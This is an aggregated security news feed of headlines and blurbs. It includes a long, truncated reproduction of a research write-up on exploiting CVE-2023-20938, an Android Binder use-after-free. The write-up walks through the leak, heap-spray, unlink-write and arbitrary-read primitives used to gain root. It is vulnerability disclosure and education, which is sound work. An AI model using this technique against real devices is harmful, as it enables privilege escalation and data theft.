https://tuency.cert.at/docs/ [12] https://www.cert.at/de/services/daten-feeds/vulnerable/

https://www.cert.at/en/blog/2024/6/how-we-cover-your-back
FIRST Annual Report Released
2024-06-10T00:00:00Z | 1717977600

FIRST published its eighth Annual Report which covers the organization’s accomplishments towards its vision of bringing together incident response and security teams from every country across the world to ensure a safe internet for all. The report is available at FIRST Annual Report 2023-2024.

https://www.first.org/about/reports/FIRST-Annual-Report-2023-2024.pdf
A CxO’s Guide: Tough Questions to Ask When Moving to SASE
2024-06-09T18:37:25Z | 1717958245

Making the Paradigm Shift A paradigm shift away from traditional network and security architectures towards a more flexible and highly scalable cloud-native SASE Cloud architecture can be stomach-churning for many CxOs today. However, taking a holistic view of the drivers of this shift will help put things into perspective. Realizing desired outcomes like the reallocation... The post A CxO’s Guide: Tough Questions to Ask When Moving to SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-cxos-guide-tough-questions-to-ask-when-moving-to-sase/
7 Compelling Reasons Why Analysts Recommend SASE
2024-06-09T18:17:43Z | 1717957063

Gartner introduced SASE as a new market category in 2019, defining it as the convergence of network and security into a seamless, unified, cloud-native solution. This includes SD-WAN, FWaaS, CASB, SWG, ZTNA, and more. A few years have gone by since Gartner’s recognition of SASE. Now that the market has had time to learn and... The post 7 Compelling Reasons Why Analysts Recommend SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/7-compelling-reasons-why-analysts-recommend-sase/
Announcing AI/ML safety and security trainings
2024-06-07T13:00:41Z | 1717765241

We are offering AI/ML safety and security training this year! Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience […]

https://blog.trailofbits.com/2024/06/07/announcing-ai-ml-safety-and-security-trainings/
Phishing Attacks 2.0: New Kits, New Risks, New Defenses by Vectra AI Product Team
2024-06-07T00:00:00Z | 1717718400

Phishing attacks are still on the rise, in fact, they never went away. See why phishing remains a huge threat to users and SOC teams everywhere.

https://www.vectra.ai/blog/phishing-attacks-2-0-new-kits-new-risks-new-defenses
SASE Evaluation Tips: The Risk of Public Cloud’s High Costs on SASE Delivery
2024-06-06T14:54:40Z | 1717685680

David Heinemeier Hansson lays out the economic case for why application providers should leave the cloud in a recently published blog post. It’s a powerful argument that needs to be heard by IT vendors and IT buyers, whether they are purchasing cloud applications or SASE services. Hansson is the co-owner and CTO of 37Signals, which... The post SASE Evaluation Tips: The Risk of Public Cloud’s High Costs on SASE Delivery appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-evaluation-tips-the-risk-of-public-clouds-high-costs-on-sase-delivery/
9 Malware Types Enterprise Professionals Need to Know
2024-06-06T13:00:00Z | 1717678800

Learn about nine malware types so that you can take steps to protect your enterprise business and your customers from cyberattackers.

https://www.akamai.com/blog/security/2024/jun/9-malware-types-enterprise-professionals-need-to-know
Maikuu küberruumis: mitut olulist e-teenust tabasid katkestused
2024-06-06T09:54:29Z | 1717667669

Riigi Infosüsteemi Ameti (RIA) maikuu kokkuvõttest selgub, et korduvalt esines tõrkeid autentimisteenuste kasutamisel ning häiritud oli ka piletimüügiveebide ja tervisekassa digiteenuste töö.

https://ria.ee/uudised/maikuu-kuberruumis-mitut-olulist-e-teenust-tabasid-katkestused
The Inside Story: How the TAG Heuer Porsche Formula E Team Uses Cato SASE Cloud
2024-06-06T09:35:16Z | 1717666516

The post The Inside Story: How the TAG Heuer Porsche Formula E Team Uses Cato SASE Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-inside-story-how-the-tag-heuer-porsche-formula-e-team-uses-cato-sase-cloud/
2024: Old CVEs, New Targets ? Active Exploitation of ThinkPHP
2024-06-05T14:00:00Z | 1717596000

https://www.akamai.com/blog/security-research/2024/jun/2024-thinkphp-applications-exploit-1-days-dama-webshell
Akamai Celebrates Earth Day with a Cleanup of Rio Agres
2024-06-05T13:00:00Z | 1717592400

https://www.akamai.com/blog/sustainability/2024/jun/akamai-celebrates-earth-day-cleanup-rio-agres
10 of the Best Website Security Tools to Stay Ahead of Hackers
2024-06-05T13:00:00Z | 1717592400

Which website security tools are really necessary for your site? What to consider before investing in new software. 10 must-have tools you can’t skip.

https://wpscan.com/blog/website-security-tools/
Valmis riikliku mobiilirakenduse esimene etapp
2024-06-05T10:18:54Z | 1717582734

Mai lõpus andis riikliku mobiilirakenduse arendustöid tegev Net Group Riigi Infosüsteemi Ametile (RIA) üle esimese etapi tööd.

https://ria.ee/uudised/valmis-riikliku-mobiilirakenduse-esimene-etapp
Radiflow, Opscura align to deliver advanced industrial cyber defense solutions, protect industrial networks and systems
2024-06-05T07:32:39Z | 1717572759

The post Radiflow, Opscura align to deliver advanced industrial cyber defense solutions, protect industrial networks and systems appeared first on Radiflow.

https://industrialcyber.co/news/radiflow-aligns-with-opscura-to-deliver-advanced-industrial-cyber-defense-solutions-protect-industrial-networks-and-systems/
Security Alert (A24-06-02): Multiple Vulnerabilities in Android
2024-06-05T04:00:00Z | 1717560000

Google has released Android Security Bulletin June 2024 to address multiple vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Five Ways Hybrid Attackers Find Exposure Beyond the Endpoint  by Jesse Kimbrel
2024-06-05T00:00:00Z | 1717545600

Today’s hybrid environments mean cyberattacks are also hybrid. Here are five real-world examples where hybrid attackers are exposing environments beyond the endpoint.

https://www.vectra.ai/blog/five-ways-hybrid-attackers-find-exposure-beyond-the-endpoint
It’s Time to Take Control of Experiences and Transform Infrastructure Operations for AI
2024-06-04T16:23:51Z | 1717518231

Cisco Networking Cloud platform has made phenomenal progress toward continuous intelligence, predictive analytics, and automated remediation over the past 12 months. The post It’s Time to Take Control of Experiences and Transform Infrastructure Operations for AI appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/06/its-time-to-take-control-of-experiences-and-transform-infrastructure-operations-for-ai/
Cisco Live 2024: Ensure Digital Resilience, Pervasive Security, and Simpler Operations
2024-06-04T15:07:00Z | 1717513620

How do you effectively manage experiences if you no longer own all the infrastructure? The answer is at the heart of new operational innovations and infrastructure announced at Cisco Live 2024. They’re all part of the Cisco Networking Cloud platform. The post Cisco Live 2024: Ensure Digital Resilience, Pervasive Security, and Simpler Operations appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2024/06/cisco-live-2024-ensure-digital-resilience-pervasive-security-and-simpler-operations/
Cisco Reveals Nexus HyperFabric AI Clusters, A New Simplified Data Center Infrastructure Solution with NVIDIA for Generative AI
2024-06-04T15:06:00Z | 1717513560

Cisco announced a breakthrough AI cluster solution with NVIDIA for the data center, transforming how customers build, manage and optimize infrastructure.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m06/cisco-reveals-nexus-hyperfabric-the-new-generative-ai-infrastructure-solution-with-nvidia-to-help-simplify-data-center-operations.html
Deploying Cato SASE, Step by Step
2024-06-04T11:28:57Z | 1717500537

It’s not uncommon for enterprises to find themselves in a situation where they’ve purchased new technology but are then faced with the hurdle of understanding what they’ve acquired and how to deploy it. This can often lead to confusion, deployment delays, and frustration with the new technology. Deploying the Cato SASE solution can be both... The post Deploying Cato SASE, Step by Step appeared first on Cato Networks.

https://www.catonetworks.com/blog/deploying-cato-sase-step-by-step/
It?s Getting Hot in Here: EMEA SOTI
2024-06-04T07:00:00Z | 1717484400

https://www.akamai.com/blog/security-research/2024/jun/2024-emea-soti-ddos-trends-dns-legislation-finserv
Security Alert (A24-06-01): Multiple Vulnerabilities in Microsoft Edge
2024-06-04T04:00:00Z | 1717473600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
What’s Going on With Check Point (CVE-2024-24919)?
2024-06-04T00:00:00Z | 1717459200

Check Point recently identified a zero-day information disclosure vulnerability impacting its Network Security gateways. Find out what you need to know about CVE-2024-24919.

https://www.greynoise.io/blog/whats-going-on-with-checkpoint-cve-2024-24919
iboss Announces Zero Trust SD-WAN to Deliver Single Vendor Secure Access Service Edge (SASE)
2024-06-03T19:16:01Z | 1717442161

iboss Announces Zero Trust SD-WAN to Deliver Single Vendor Secure Access Service Edge (SASE) The post iboss Announces Zero Trust SD-WAN to Deliver Single Vendor Secure Access Service Edge (SASE) appeared first on iboss.

https://www.iboss.com/news/iboss-announces-zero-trust-sdwan-to-deliver-single-vendor-secure-access-service-edge/
Secure Miami Panel – Cybersecurity for Critical Infrastructure: Challenges and Solutions
2024-06-03T18:59:17Z | 1717441157

Secure Miami Panel - Cybersecurity for Critical Infrastructure: Challenges and Solutions The post Secure Miami Panel – Cybersecurity for Critical Infrastructure: Challenges and Solutions appeared first on iboss.

https://www.iboss.com/news/secure-miami-panel/
How SASE Is Evolving as the Workforce Remains Remote
2024-06-03T18:49:27Z | 1717440567

David Batty, iboss Vice President of Solution Architecture and Technology, sat down with ISMG at RSA 2024 to discuss how SASE is evolving as the workforce remains remote. The post How SASE Is Evolving as the Workforce Remains Remote appeared first on iboss.

https://www.iboss.com/news/how-sase-is-evolving-as-the-workforce-remains-remote/
Why Cybersecurity is Critical for the 2024 Paris Olympics
2024-06-03T17:32:02Z | 1717435922

Paul Martini, iboss CEO & CTO, shared his thoughts with Infosecurity Magazine on the 2024 Paris Olympics and the importance of cybersecurity at the event. “When you have this level of bandwidth, connectivity and access, combined with critical infrastructure, things that are required to support large numbers of people, you have a situation that is extremely high risk.” The post Why Cybersecurity is Critical for the 2024 Paris Olympics appeared first on iboss.

https://www.iboss.com/news/why-cybersecurity-is-critical-for-the-2024-paris-olympics/
Running CloudTest on Akamai Cloud Computing
2024-06-03T13:00:00Z | 1717419600

https://www.akamai.com/blog/cloud/2024/jun/running-cloudtest-on-akamai-cloud-computing
Improve Collaboration OT and IT Security Teams
2024-06-03T05:32:00Z | 1717392720

Discrete manufacturing: OT and IT security teams must collaborate OT and IT teams are used to talking about “interoperability” when it comes to devices.

https://blog.scadafence.com/improve-collaboration-ot-it-security-teams-discrete-manufacturing
Becoming any Android app via Zygote command injection
2024-06-03T00:00:00Z | 1717372800

We have discovered a vulnerability in Android that allows an attacker with the WRITE_SECURE_SETTINGS permission, which is held by the ADB shell and certain privileged apps, to execute arbitrary code as any app on a device. By doing so, they can read and write any app’s data, make use of per-app secrets and login tokens, change most system configuration, unenroll or bypass Mobile Device Management, and more. Our exploit involves no memory corruption, meaning it works unmodified on virtually any device running Android 9 or later, and persists across reboots.

https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
Attacking Android Binder: Analysis and Exploitation of CVE-2023-20938
2024-06-03T00:00:00Z | 1717372800

At OffensiveCon 2024, the Android Red Team gave a presentation (slides) on finding and exploiting CVE-2023-20938, a use-after-free vulnerability in the Android Binder device driver. This post will provide technical details about this vulnerability and how our team used it to achieve root privilege from an untrusted app on a fully up-to-date (at the time of exploitation) Android device. This vulnerability affected all Android devices using GKI kernel versions 5.4 and 5.10. This vulnerability is fixed and the patches were released as part of the Android Security Bulletin–February 2023 and July 2023 (more details in the remediation section of the blog). This is the first post of a multi-part series where we discuss our journey into Binder: Part 1: Attacking Android Binder: Analysis and Exploitation of CVE-2023-20938 Part 2: Binder Internals Binder Binder is the primary inter-process communication (IPC) channel on Android. It supports a variety of features such as passing file descriptors and objects containing pointers across process boundaries. It is composed of userspace libraries (libbinder and libhwbinder) provided by the Android platform and a kernel driver in the Android Common Kernel. Therefore, it provides a common IPC interface for Java and native code which can be defined in AIDL. The term “Binder” is commonly used to refer to many parts of its implementation (there is even a Java class called Binder in Android SDK), but in this post we will use the term “Binder” to refer to the Binder device driver unless otherwise stated. Binder device driver (/dev/binder) All untrusted apps on Android are sandboxed and inter-process communication mostly occurs through Binder. Meanwhile, Chrome’s renderer process on Android is assigned the isolated_app SELinux context, which is more restrictive than untrusted apps. Despite that, it also has access to Binder and a limited set of Android services. Therefore, Binder presents a wide attack surface because it is accessible by default to every untrusted and isolated app. History of Binder vulnerabilities Here is a list of recent exploits that have exploited vulnerabilities in Binder to achieve root privilege: CVE-2019-2025 Waterdrop: slides, video CVE-2019-2215 Bad Binder: blog, video CVE-2020-0041: blog CVE-2020-0423 Typhoon Mangkhut: slides, video CVE-2022-20421 Bad Spin: whitepaper, video To provide high performance IPC, Binder consists of an extremely complex object lifetime, memory management, and concurrent threading model. To give a sense of this complexity, we counted three different types of concurrency synchronization primitives (5 locks, 6 reference counters, and a few atomic variables) all being used in the same 6.5k line file implementing the driver. The locking in Binder is also extremely fine-grained for performance reasons, further increasing the complexity of the code. There have been a number of successful attacks against Binder in recent years by leveraging several security issues, primarily caused by use-after-free bugs. These bugs arise from various root causes, including improper cleanup logic (CVE-2019-2215 and CVE-2022-20421), data races (CVE-2020-0423), and intra-object out-of-bounds access (CVE-2020-0041). This blog provides information on a UAF issue which is a result of improper clean up implementation while processing a Binder transaction which leads to a refcounting error. Making an RPC call with Binder This section will describe how a userspace program interacts with Binder. This section provides a quick overview of what Binder is and how userspace applications interact with it on Android to help illustrate some concepts in Binder. However, if you are already familiar with Binder, feel free to skip this and go to the Vulnerability section. Initialize a Binder endpoint Developing programs to perform IPC via Binder is somewhat different from using other types of sockets (e.g. such as network sockets, etc). Every client first open the Binder device and create a memory mapping using the returned file descriptor: int fd = open("/dev/binder", O_RDWR, 0); void *map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, ctx->fd, 0); This memory will be used for the Binder driver’s memory allocator, which is used to store all of the incoming transaction data. This mapping is read-only for the client, but writable by the driver. Send & Receive A Transaction Instead of calling the send and recv syscalls, clients perform most IPC interactions by sending the BINDER_WRITE_READ ioctl to the Binder driver. The argument to the ioctl is a struct binder_write_read object: struct binder_write_read bwr = { .write_size = ..., .write_buffer = ..., .read_size = ..., .read_buffer = ... }; ioctl(fd, BINDER_WRITE_READ, &bwr); The write_buffer pointer field points to a userspace buffer containing a list of commands from the client to the driver. Meanwhile, the read_buffer pointer field points to a userspace buffer in which the Binder driver will write commands from the driver to the client. Note: The motivation for this design is that a client can send a transaction and then wait for a response with one ioctl syscall. In contrast, IPC with sockets requires two syscalls, send and recv. The diagram below shows the data involved when sending a transaction to a client linked to the Ref 0 (target.handle) and the transaction contains a Node object (BINDER_TYPE_BINDER): The write_buffer points to a buffer that contains a list of BC_* commands and their associated data. The BC_TRANSACTION command instructs Binder to send a transaction struct_binder_transaction_data. The read_buffer points to an allocated buffer that will be filled by Binder when there are incoming transactions. The struct binder_transaction_data contains a target handle and two buffers, buffer and offsets. The target.handle is the Ref ID associated with the recipient, which we will discuss how it is created later. The buffer points to a buffer containing a mix of Binder objects and opaque data. The offsets points to an array of offsets at which every Binder object is located in the buffer. The recipient will receive a copy of this struct binder_transaction_data in the read_buffer after it performs a read with the BINDER_WRITE_READ ioctl. Users can send a Node by including a struct flat_binder_object with the type field set to BINDER_TYPE_BINDER in the transaction data. The Node is a type of Binder object, which we will discuss more in the next section. Establish a connection with another process Binder uses objects such as a Node and a Ref to manage communication channels between processes. If a process wants to allow another process to talk to it, it sends a Node to that process. Binder then creates a new Ref in the target process and associates it with the Node, which establishes a connection. Later, the target process can use the Ref to send a transaction to the process that owns the Node associated with the Ref. The image above illustrates the steps on how App A establishes a connection for App B with itself, so App B can send transactions to App A to perform RPC calls. The steps are as follows: App A sends a transaction to App B containing a Node with 0xbeef as ID. The transaction is similar to the one shown above and the Node is represented by the struct flat_binder_object data. Binder associates the Node 0xbeef with App A internally and initializes a reference counter to keep track of how many Refs are referencing it. In the actual implementation, there are 4 reference counters in the underlying Node data structure (struct binder_node), which we will cover later. Binder creates a Ref 0xbeef that belongs to App B internally and it references App A’s Node 0xbeef. This step increments the Node 0xbeef refcount by 1. Now, App B can send transactions to App A by using 0xbeef as the target.handle in its struct binder_transaction_data in future. When Binder processes the transaction sent by B, it can find out that the Ref 0xbeef references App A’s Node 0xbeef and send the transaction to App A. Binder Context Manager One might ask a question: How does App A send a Node to App B if there is no connection between them in the first place? Firstly, in addition to sending a Node object from one process to another (as shown above) it is also possible to send a Ref object in a similar way. For example, assuming that there exists another App C, then App B can send the Ref (created at step 3 above) to App C. Once App C receives the Ref from App B it can use the Ref to send transactions to App A. Secondly, Binder enables a special process to claim itself as the Context Manager with the BINDER_SET_CONTEXT_MGR ioctl and only one single process can hold the role. The Context Manager is a special Binder IPC endpoint always accessible at handle (Ref) 0 which serves as an intermediary to make Binder IPC endpoints discoverable by other processes. For instance, a process Client 1 sends a Node (e.g. 0xbeef) to the Context Manager, which in turn receives a Ref (0xbeef). Then, another third process Client 2 initiates a transaction to the Context Manager asking for that Ref (0xbeef). Context Manager responds to the request by returning the Ref (0xbeef). Consequently, this establishes a connection between two processes as Client 2 can now send transactions to Client 1 using the Ref (0xbeef). On Android, the ServiceManager process claims itself as the Context Manager during startup. System services register their Binder Nodes with the Context Manager to be discoverable by other Apps. Vulnerability A client can include a Binder object (struct binder_object) in a transaction, which can be any of these: Name Enum Description Node BINDER_TYPE_BINDERBINDER_TYPE_WEAK_BINDER A Node Ref BINDER_TYPE_HANDLEBINDER_TYPE_WEAK_HANDLE A reference to a Node Pointer BINDER_TYPE_PTR A pointer to a memory buffer used for transferring data File Descriptor BINDER_TYPE_FD A file descriptor File Descriptor Array BINDER_TYPE_FDA An array of file descriptors Before sending all Binder objects to the recipient, Binder must translate those objects from the sender’s context into the recipient’s context in the binder_transaction function: static void binder_transaction(...) { ... // Iterate through all Binder objects in the transaction for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(binder_size_t)) { // Process/translate one Binder object } ... } For example, consider a scenario where a client shares a file to another client by sending a file descriptor via Binder. To allow the recipient to access the file, Binder translates the file descriptor by installing a new file descriptor with the shared file in the recipient’s task process. Note: Some objects are actually translated when the recipient reads the transaction - when BINDER_WRITE_READ ioctl is invoked by the recipient - while others are translated at the moment of sending transaction by the sender - when BINDER_WRITE_READ ioctl is invoked by the sender. There exists a code path for error handling [1] when processing a transaction with an unaligned offsets_size. Notice that Binder skips the for-loop processing Binder objects, so buffer_offset remains 0 and is then passed to the binder_transaction_buffer_release function call [2] as an argument: static void binder_transaction(..., struct binder_transaction_data *tr, ...) { binder_size_t buffer_offset = 0; ... if (!IS_ALIGNED(tr->offsets_size, sizeof(binder_size_t))) { // [1] goto err_bad_offset; } ... // Iterate through all Binder objects in the transaction for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(binder_size_t)) { // Process a Binder object } ... err_bad_offset: ... binder_transaction_buffer_release(target_proc, NULL, t->buffer, /*failed_at*/buffer_offset, // [2] /*is_failure*/true); ... } binder_transaction_buffer_release is a function that undoes every side effect that Binder caused after processing Binder objects in the transaction. For example, closing the opened file descriptor in the recipient process’s task. In error handling cases, Binder must only clean up Binder objects that it has already processed before hitting an error. The failed_at and is_failure parameters in the function determine how many Binder objects Binder has to clean up. Back to the error handling path of unaligned offsets_size where failed_at == 0 and is_failure == true. In this case, Binder calculates off_end_offset to be the end of the transaction buffer. Therefore, Binder cleans up every Binder object in the transaction. However, Binder did not process any Binder objects in the first place because it hit the error and skipped the for-loop which processes the Binder objects. static void binder_transaction_buffer_release(struct binder_proc *proc, struct binder_thread *thread, struct binder_buffer *buffer, binder_size_t failed_at/*0*/, bool is_failure/*true*/) { ... off_start_offset = ALIGN(buffer->data_size, sizeof(void *)); off_end_offset = is_failure && failed_at ? failed_at : off_start_offset + buffer->offsets_size; for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(size_t)) { ... } ... } The reason for this logic is that the meaning of failed_at is overloaded: there are other parts of the code that use this logic to clean up the entire buffer. However, in this case we’ve hit this code path without processing any objects, which will introduce inconsistency in reference counting. In the following section we will demonstrate how to leverage this vulnerability to achieve a use-after-free of a Binder Node object and turn it into a privilege escalation PoC. Exploitation In a previously published exploit for CVE-2020-004, Blue Frost Security exploited the same cleanup process to achieve root privilege. However, they exploited a vulnerability that modifies the Binder objects within the transaction after Binder had processed it. They published a PoC to demonstrate their root privilege escalation on a Pixel 3 running kernel version 4.9. We took inspiration from this past exploit to first achieve the same leak and unlink primitives in Binder. Because of some changes in the SLUB allocator’s caches in newer kernel versions, we used a different approach to perform use-after-free on the victim objects. We will explain those changes and how we overcame them in a later section. UAF of a binder_node A Node (struct binder_node) is a Binder object (struct flat_binder_object) in a transaction with the header type BINDER_TYPE_BINDER or BINDER_TYPE_WEAK_BINDER. Binder creates a Node internally when a client sends a Node to another client. Binder also manages several reference counters in the Node to determine its lifetime. In this section, we demonstrate how to leverage the vulnerability described above to introduce inconsistency in one of the reference counters of a Node object, which leads to freeing this object while having a dangling pointer to it and, thus, resulting in a use-after-free. When the binder_transaction_buffer_release function iterates through all Binder objects in the buffer and encounters a Node with the header type BINDER_TYPE_BINDER or BINDER_TYPE_WEAK_BINDER, it calls the binder_get_node function to retrieve the binder_node that belongs to the recipient process’s context (proc) and has the Node ID equal to fp->binder ([1] in the listing below). Then, it calls the binder_dec_node function to decrement one of its reference counters ([2] in the listing below). Suppose we have a Node in the transaction with the header type BINDER_TYPE_BINDER, then Binder calls binder_dec_node function with passing expressions strong == 1 and internal == 0 as function arguments. static void binder_transaction_buffer_release(...) { ... for (buffer_offset = off_start_offset; buffer_offset < off_end_offset; buffer_offset += sizeof(size_t)) { ... case BINDER_TYPE_BINDER: case BINDER_TYPE_WEAK_BINDER: { ... // [1] node = binder_get_node(proc, fp->binder); ... // [2] binder_dec_node(node, /*strong*/ hdr->type == BINDER_TYPE_BINDER, /*internal*/ 0); ... } break; ... } ... } Note: The terms Node and binder_node are interchangeable, but the term binder_node usually refers to the underlying Node data structure in Binder. The term Node is also used to refer to a struct flat_binder_object in a transaction that has the header type BINDER_TYPE_BINDER and BINDER_TYPE_WEAK_BINDER. The binder_dec_node function calls binder_dec_node_nilocked to decrement one of the reference counters ([1] in listing below) of the binder_node. If binder_dec_node_nilocked returns true, the function will call binder_free_node to free the binder_node ([2] in listing below). That’s exactly the branch we want to be taken in order to achieve UAF. static void binder_dec_node(struct binder_node *node, int strong /*1*/, int internal /*0*/) { bool free_node; binder_node_inner_lock(node); free_node = binder_dec_node_nilocked(node, strong, internal); // [1] binder_node_inner_unlock(node); if (free_node) binder_free_node(node); // [2] } Note: There are many functions in Binder that has a suffix *locked which expects that the caller has acquired necessary locks before calling them. More details about all the suffixes can be found at the top of /drivers/android/binder.c code. In the binder_dec_node_nilocked function, if strong == 1 and internal == 0, it decrements the local_strong_refs field in binder_node. static bool binder_dec_node_nilocked(struct binder_node *node, int strong /*1*/, int internal /*0*/) { ... if (strong) { if (internal) ... else node->local_strong_refs--; ... } else { ... } ... } Thus, to trigger the vulnerability we can send a transaction with a Node object with the header type set to BINDER_TYPE_BINDER and the binder field set to the ID of the Node (struct binder_node) we want to decrement the value of its local_strong_refs reference counter. The diagram below shows a malicious transaction that exploits the vulnerability to decrement a reference counter in the Node 0xbeef of the recipient client two times. The transaction contains two Nodes (struct flat_binder_object) and an unaligned offsets_size. The unaligned offsets_size cause Binder to take the vulnerable error-handling path in the binder_transaction function, which skips processing the two Nodes in the transaction. This exploits the binder_transaction_buffer_release function to clean up those two Nodes, which decrements the Node 0xbeef’s local_strong_refs twice – once for each of the 2 struct flat_binder_ojbect objects in the transaction. Now, let’s analyze which conditions struct binder_node needs to satisfy to be freed in the binder_dec_node function (i.e. under what conditions binder_dec_node_nilocked returns true forcing binder_dec_node to free the binder_node). Based on the code fragment below, the binder_dec_node_nilocked returns true based on the values of several fields in the struct binder_node. static bool binder_dec_node_nilocked(struct binder_node *node, int strong /*1*/, int internal /*0*/) { ... if (strong) { if (internal) ... else node->local_strong_refs--; if (node->local_strong_refs || node->internal_strong_refs) return false; } else { ... } if (proc && (node->has_strong_ref || node->has_weak_ref)) { ... } else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { ... return true; } } return false; } To ensure that binder_dec_node_nilocked returns true after decrementing local_strong_refs, we have to pass a node that meets the following conditions: // Reference counters in struct binder_node local_strong_refs == 1 // before `binder_dec_node_nilocked` decrements it local_weak_refs == 0 internal_strong_refs == 0 tmp_refs == 0 has_strong_ref == 0 has_weak_ref == 0 hlist_empty(&node->refs) == true Thus, to free a binder_node object in the binder_dec_node function we must set up a binder_node that does not have any Refs referencing it and all reference counters are equal to zero except the local_strong_refs. Then, we can exploit the vulnerability to decrement the local_strong_refs and cause it to be freed by binder_free_node. A simple way to set up a binder_node as such is as follows: Client A and Client B establish a connection between each other with the Node 0xbeef and Ref 0xbeef (refer to previous diagrams). The Node begins with local_strong_refs equal to 1 because only the Ref object is referencing the Node. Client B sends a transaction with the target.handle set to 0xbeef. Binder processes it, allocates a binder_buffer on the Client A’s side and copies the transaction data into the allocated buffer. At this moment, the Node’s local_strong_refs is equal to 2 because the Ref object and the transaction are referencing the Node. Client B closes the Binder file descriptor, which releases the Ref object and decrements the local_strong_refs by 1. Now, the Node’s local_strong_ref goes back to 1 because only the transaction is referencing the Node. The diagram below illustrates the setup of a binder_node before and after exploiting the vulnerability to free it: After freeing the binder_node by exploiting the vulnerability, this leaves a dangling pointer in the target_node of the binder_buffer. In the following sections we utilize this use-after-free multiple times to obtain the necessary primitives for our exploit to root an Android device. First we obtain a limited leak primitive enabling us to leak 16 bytes (2 8-byte values) from the kernel heap. We built on top of this primitive to get next-stage unlink primitive enabling us to overwrite kernel memory with the attacker controlled data. Next, we leverage both leak and unlink primitives to obtain arbitrary kernel memory read primitive which we use to identify addresses of kernel structures we want to overwrite to finally get root privileges on the devices. Leak primitive First, we exploit the vulnerability in the use-after-free read of a freed binder_node object in the binder_thread_read function. When a client performs a BINDER_WRITE_READ ioctl to read incoming transactions from Binder, Binder calls the binder_thread_read function to copy incoming transactions back to the userspace. This function copies two fields from the binder_node (ptr and cookie) into a transaction ([1] and [2]). Then, Binder copies the transaction back to userspace [3]. Therefore, we can cause an use-after-read to leak two values from the kernel heap memory. static int binder_thread_read(...) { ... struct binder_transaction_data_secctx tr; struct binder_transaction_data *trd = &tr.transaction_data; ... struct binder_transaction *t = NULL; ... t = container_of(w, struct binder_transaction, work); ... if (t->buffer->target_node) { struct binder_node *target_node = t->buffer->target_node; trd->target.ptr = target_node->ptr; // [1] trd->cookie = target_node->cookie; // [2] ... } ... if (copy_to_user(ptr, &tr, trsize)) { // [3] ... } ... } The binder_node object is allocated from the kmalloc-128 SLAB cache and the two 8-bytes leaks are at offsets 88 and 96. gdb> ptype /o struct binder_node /* offset | size */ type = struct binder_node { ... /* 88 | 8 */ binder_uintptr_t ptr; /* 96 | 8 */ binder_uintptr_t cookie; Unlink primitive There can be an use-after-free in an unlink operation in the binder_dec_node_nilocked function [1]. However, there are also multiple checks before reaching the unlink operation. static bool binder_dec_node_nilocked(struct binder_node *node, int strong, int internal) { struct binder_proc *proc = node->proc; ... if (strong) { ... if (node->local_strong_refs || node->internal_strong_refs) return false; } else { ... } if (proc && (node->has_strong_ref || node->has_weak_ref)) { ... } else { if (hlist_empty(&node->refs) && !node->local_strong_refs && !node->local_weak_refs && !node->tmp_refs) { if (proc) { ... } else { BUG_ON(!list_empty(&node->work.entry)); ... if (node->tmp_refs) { ... return false; } hlist_del(&node->dead_node); // [1] ... } return true; } } return false; } The unlink operation implemented in __hlist_del function basically modifies two kernel pointers to point to each other. static inline void __hlist_del(struct hlist_node *n) { struct hlist_node *next = n->next; struct hlist_node **pprev = n->pprev; WRITE_ONCE(*pprev, next); if (next) WRITE_ONCE(next->pprev, pprev); } Without loss of generality it can be summarized as: *pprev = next *(next + 8) = pprev To reach the unlink operation, we must reallocate the freed binder_node object with a fake binder_node object whose data we control. For that we can use a well-known sendmsg heap spray technique to allocate an object with arbitrary data on top of the freed binder_node. Because there are multiple checks before the unlink operation, we must fill the fake binder_node with the right data to pass them. We must create a fake binder_node object with the following conditions: node->proc == 0 node->has_strong_ref == 0 node->has_weak_ref == 0 node->local_strong_refs == 0 node->local_weak_refs == 0 node->tmp_refs == 0 node->refs == 0 // hlist_empty(node->refs) node->work.entry = &node->work.entry // list_empty(&node->work.entry) The last condition is tricky to satisfy because we must already know the address of the freed binder_node to calculate the correct &node->work.entry. Fortunately, we can use our leak primitive to leak a binder_node address before exploiting the vulnerability to free it. Here is how we can accomplish this. Leak a binder_node address A binder_ref object is allocated from the kmalloc-128 SLAB cache and contains a pointer to the corresponding binder_node object exactly at offset 88 (as you remember our leak primitive discussed above leaks two 8-byte values at offsets 88 and 96 during use-after-free read). gdb> ptype /o struct binder_ref /* offset | size */ type = struct binder_ref { ... /* 88 | 8 */ struct binder_node *node; /* 96 | 8 */ struct binder_ref_death *death; Therefore, we can leak an address to a binder_node with the following steps: Exploit the vulnerability to free a binder_node. Allocate a binder_ref on top of the freed binder_node. Use the leak primitive to leak an address to a binder_node from the binder_ref. Once we leak the address of the freed binder_node object we have all the necessary data to set up our unlink primitive. After reallocating our fake binder_node with sendmsg, we send a BC_FREE_BUFFER binder command to free the transaction containing the dangling binder_node to trigger the unlink operation. At this point, we achieve a limited arbitrary write primitive – due to the implementation details of __hlist_del function we overwrite kernel memory either with a valid kernel pointer or with NULL. Arbitrary Read Primitive The exploit for CVE-2020-0041 utilized the FIGETBSZ ioctl to obtain arbitrary read primitive. The FIGETBSZ ioctl copies 4 bytes of data corresponding to the s_blocksize member of struct super_block from the kernel back to the userspace as shown in the listing below at [1]. static int do_vfs_ioctl(struct file *filp, ...) { ... struct inode *inode = file_inode(filp); ... case FIGETBSZ: ... return put_user(inode->i_sb->s_blocksize, (int __user *)argp); // [1] ... } ioctl(fd, FIGETBSZ, &value); // &value == argp The diagram below shows the location of the s_blocksize field as referenced by struct file and struct 